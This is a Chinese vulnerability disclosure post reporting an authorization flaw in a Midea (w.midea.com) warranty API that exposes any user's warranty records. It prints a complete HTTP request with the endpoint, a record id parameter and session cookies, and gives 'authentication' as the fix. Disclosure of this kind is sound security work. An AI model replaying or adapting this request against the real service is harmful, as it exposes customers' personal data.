首页 » 漏洞 » 美的某接口越权查看任意用户保修单信息(可影响大量数据)

美的某接口越权查看任意用户保修单信息(可影响大量数据)

 

接口地址

code 区域
GET /my/warranty/getrecorddetail?id=M2015101116300&t= HTTP/1.1

Host: w.midea.com

Proxy-Connection: keep-alive

Accept: application/json

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36

Referer: http://w.midea.com/my/warranty/warrantylist

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: uid=8803380; sukey=C1LuBk0FYZ;

需要cookies 访问

美的某接口越权查看任意用户保修单信息(可影响大量数据)

漏洞证明:

美的某接口越权查看任意用户保修单信息(可影响大量数据)

美的某接口越权查看任意用户保修单信息(可影响大量数据)

修复方案:

鉴权

原文链接:美的某接口越权查看任意用户保修单信息(可影响大量数据),转载请注明来源!

0